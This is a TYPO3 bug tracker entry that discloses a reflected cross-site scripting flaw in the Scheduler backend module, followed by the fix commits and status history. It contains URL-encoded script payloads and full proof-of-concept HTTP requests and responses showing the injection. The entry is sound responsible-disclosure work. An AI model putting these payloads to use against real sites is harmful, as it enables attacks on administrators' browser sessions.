Bug #82079

XSS in scheduler

Added by Oliver Hader about 2 years ago. Updated 12 months ago.

Status:
Closed
Priority:
Should have
Assignee:
-
Category:
-
Target version:
-
Start date:
2017-08-10
Due date:
% Done:

100%

TYPO3 Version:
6.2
PHP Version:
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

I would like to inform you about security issue that I have found on the plugin SCHEDULER of the cms TYPO3 (checked on version 8.7.3), specifically it is accessible in the "Scheduler" section of the Backend administrative console.

The plugin Scheduler of TYPO3 is resulted vulnerable to Reflected Cross-Site Scripting, for the requests to Add or Edit a task, specifically on the 2 parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".

Technical Details =================
Below is descripted the scenario to reproduce the security issue.

Proof of Concept:
To replicate the issue an authenticated user (with permission to create/edit tasks) have to click the button "Add-Task" or "Edit-Task" in the Scheduler area.
And so is sufficient to grab the request which is being passed to the server and add the payloads in the 2 vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D", so the submitted payloads are replicated on the response.

EXAMPLE
Payloads:
krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1
de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag

ORIGINAL REQUEST:
----------------------------------
POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 479
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save

PoC REQUEST:
-----------------------
GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

PoC RESPONSE:
--------------------------
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2017 09:35:42 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51666

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<label>Task group</label></abbr></span><div class="form-control-wrap"><select name="tx_scheduler[task_group]" id="task_class" class="form-control"><option value="0" title=""></option></select></div></div></div>
<div class="form-section"><div class="row"><div class="form-group col-sm-6" id="task_start_col"><label><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"><abbr class="t3-help-teaser">Start (HH:MM DD-MM-YYYY)</abbr></span></label><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"><input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"><input name="tx_scheduler[start]" value="15008874533rup3z"><script>alert(1)</script>yflbjwmu6m1" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_start_row"><span class="fa fa-calendar"></span></label></span></div></div></div>
<div class="form-group col-sm-6" id="task_end_col"><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"><abbr class="t3-help-teaser"><label>End (HH:MM DD-MM-YYYY)</label></abbr></span><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"><input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"><input name="tx_scheduler[end]" value="de6gi"><script>alert(2)</script>h3wq9ysmjag" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_end_row"><span class="fa fa-calendar"></span></label></span></div></div></div></div></div>
[...]

Attached a screenshot of the PoC to better illustrate the vulnerability.

Vulnerable Versions:
TYPO3 8.7.3 and earlier

Checked on TYPO3/8.7.3

I have not received your response for the other 2 previous reporting (I hope to receive at least a response from you). Anyway I am always available if you need further explanations, kind regards.

Associated revisions

Revision bb60d697 (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in scheduler extension

Releases: master,8.7,7.6
Resolves: #82079
Change-Id: I21a6ebcff4ebd0c6f2d2c83e0aa6d9e2c03d32d9
Reviewed-on: https://review.typo3.org/53720
Tested-by: TYPO3com <>
Reviewed-by: Wolfgang Klinger <>
Reviewed-by: Andreas Fernandez <>
Tested-by: Andreas Fernandez <>
Reviewed-by: Frank Naegler <>
Tested-by: Frank Naegler <>

Revision bed4ceb6 (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in scheduler extension

Releases: master,8.7,7.6
Resolves: #82079
Change-Id: I21a6ebcff4ebd0c6f2d2c83e0aa6d9e2c03d32d9
Reviewed-on: https://review.typo3.org/53737
Reviewed-by: Frank Naegler <>
Tested-by: Frank Naegler <>
Tested-by: TYPO3com <>

Revision e8ec374c (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in scheduler extension

Releases: master,8.7,7.6
Resolves: #82079
Change-Id: I21a6ebcff4ebd0c6f2d2c83e0aa6d9e2c03d32d9
Reviewed-on: https://review.typo3.org/53736
Reviewed-by: Frank Naegler <>
Tested-by: Frank Naegler <>
Tested-by: TYPO3com <>

History

#1 Updated by Gerrit Code Review about 2 years ago

  • Status changed from New to Under Review

Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at https://review.typo3.org/53699

#2 Updated by Helmut Hummel about 2 years ago

Since Scheduler is an admin only module, we can publicly fix this issue.

#3 Updated by Helmut Hummel about 2 years ago

  • Project changed from Core Security to TYPO3 Core
  • Category deleted (OW-A07: Cross Site Scripting)

#4 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53720

#5 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53736

#6 Updated by Gerrit Code Review about 2 years ago

Patch set 2 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53736

#7 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch TYPO3_7-6 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53737

#8 Updated by Wouter Wolters about 2 years ago

  • Status changed from Under Review to Resolved
  • % Done changed from 0 to 100

#9 Updated by Benni Mack 12 months ago

  • Status changed from Resolved to Closed

Also available in: Atom PDF